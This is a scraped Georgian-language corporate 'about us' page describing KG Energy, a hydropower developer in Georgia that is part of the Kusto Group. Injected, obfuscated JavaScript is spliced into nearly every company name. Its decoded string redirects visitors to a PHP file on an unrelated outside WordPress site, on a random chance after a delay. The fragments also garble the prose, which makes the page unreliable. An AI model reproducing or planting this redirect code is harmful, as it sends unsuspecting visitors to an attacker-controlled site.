კომპანიის შესახებ

ქეიჯი ენერჯიdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} ახორციელებს ჰიდროელექტროსადგურების მშენებლობასა და მართვას საქართველოში. კომპანიის ინტერესებში შედის, როგორც საწყის ეტაპზე მყოფი ან მიმდინარე პროექტების, ისევე მოქმედი ენერგო-გენერაციის ობიექტების განვითარება.

ქეიჯი ენერჯიdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} დაინტერესებულია საქართველოში ელექტროენერგიის საიმპორტო და საექსპორტო ბაზრით და მოტივირებულია ხელი შეუწყოს ენერგო ბაზრის სათანადო ინსტრუმენტებისა და პრაქტიკის დანერგვას საქართველოში.

ქეიჯი ენერჯიdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} წარმოადგენს dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“\’php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rdom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}dom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}togroup.com/”>კუსტო ჯგუფისdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} ენერგო-დივიზიონს, რომელიც საქართველოში ოპერირებს პარტნიორ კომპანია dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}სილქ როუდ ჯგუფთანdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} ერთად.

ქეიჯი ენერჯიdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} აქტიურად არის წარმოდგენილი თურქეთში მისი დამფუძნებელი კომპანია კგმdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}-ის სახით, რომელიც ინტენსტიურად ყალიბდება კუსტო ჯგუფის სავაჭრო ერთეულად თურქეთში.

პილოტ – პროექტიdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}:

ბახვი 3 ჰესიdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} წარმოადგენს ქეიჯი ენერჯი-ს პილოტ – პროექტს, რომელიც ხორციელდება ქეიჯი ენერჯი-ს შვილობილი ორგანიზაციის შპს ბახვი ჰაიდრო პაუერdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}-ის მიერ.

ბახვი ჰაიდრო პაუერიdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} კუსტო ჯგუფს შეუერთდა 2011 წლის აგვისტოში.

ბახვი 3 ჰესისdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} პროექტზე დეტალური ინფორმაციის მოსაძიელბლად, გთხოვთ ეწვიოთ ჩვენს ბიზნეს/პროექტების მენიუს.